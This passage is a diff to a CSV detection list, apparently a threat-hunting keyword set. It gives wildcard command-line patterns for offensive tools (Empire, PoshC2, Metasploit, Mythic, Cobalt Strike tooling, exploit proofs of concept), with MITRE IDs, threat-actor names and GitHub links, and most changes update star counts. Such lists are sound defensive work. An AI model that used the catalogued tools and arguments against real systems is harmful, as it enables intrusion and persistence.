T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* --payload * --platform windows*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. 
and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"* -payload *-Lhost *-Lport*","offensive_tool_keyword","empire","Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* payload add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"* -Payload * -method sysprep*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - 
T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* --payload * --platform windows*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"* -payload *-Lhost *-Lport*","offensive_tool_keyword","empire","Empire scripts arguments. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* payload add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "* --payload CommonsCollections*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"* payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" +"* payload start *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" "* --payload_file * --payload_path*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","0","Added to cover the POC exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" "* --payloadcookie *","offensive_tool_keyword","SharpSocks","Tunnellable HTTP/HTTPS socks4a proxy written in C# and deployable via 
PowerShell","T1090 - T1021.001","TA0002","N/A","N/A","C2","https://github.com/nettitude/SharpSocks","1","0","N/A","10","10","453","89","2023-03-15T19:19:30Z","2017-11-10T13:29:08Z" "* --payload-file pwn.bat*","offensive_tool_keyword","SplunkWhisperer2","Local privilege escalation or remote code execution through Splunk Universal Forwarder (UF) misconfigurations","T1068 - T1059.003 - T1071.001","TA0003 - TA0002 - TA0011","N/A","N/A","Lateral Movement - Privilege Escalation","https://github.com/cnotin/SplunkWhisperer2","1","0","N/A","9","3","239","53","2022-09-30T16:41:17Z","2019-02-24T18:05:51Z" -"* -PayloadPath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - 
HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUAC.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* PayloadsDirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" -"* payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3185","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" +"* -PayloadPath *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-BypassUAC.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* PayloadsDirectory*","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* 
payloadtests.py*","offensive_tool_keyword","the-backdoor-factory","Patch PE ELF Mach-O binaries with shellcode new version in development*","T1055.002 - T1055.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/secretsquirrel/the-backdoor-factory","1","0","N/A","10","10","3186","809","2023-08-14T02:52:06Z","2013-05-30T01:04:24Z" "* PayloadType.BIND_TCP*","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1043 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","0","N/A","10","10","303","45","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z" "* --payload-types all*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" "* --payload-types bin*","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","0","N/A","10","10","158","33","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z" 
@@ -1493,22 +1493,22 @@ "* pcanywhere-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* pcworx-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* -PE_Clone *","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera 
- APT29","C2","https://github.com/Tylous/SourcePoint","1","0","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"* -pe-exp-list *.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","761","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" -"* -PEPath * -ExeArgs *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"* -PermanentWMI *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Persistence.psm1","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -pe-exp-list *.dll*","offensive_tool_keyword","C2 related tools","PowerShell rebuilt in C# for Red Teaming purposes","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - 
T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider","C2","https://github.com/bitsadmin/nopowershell","1","0","N/A","10","10","762","126","2021-06-17T12:36:05Z","2018-11-28T21:07:51Z" +"* -PEPath * -ExeArgs *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - 
","Frameworks","https://github.com/EmpireProject/Empire","1","0","Invoke-PSInject.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"* -PermanentWMI *","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - 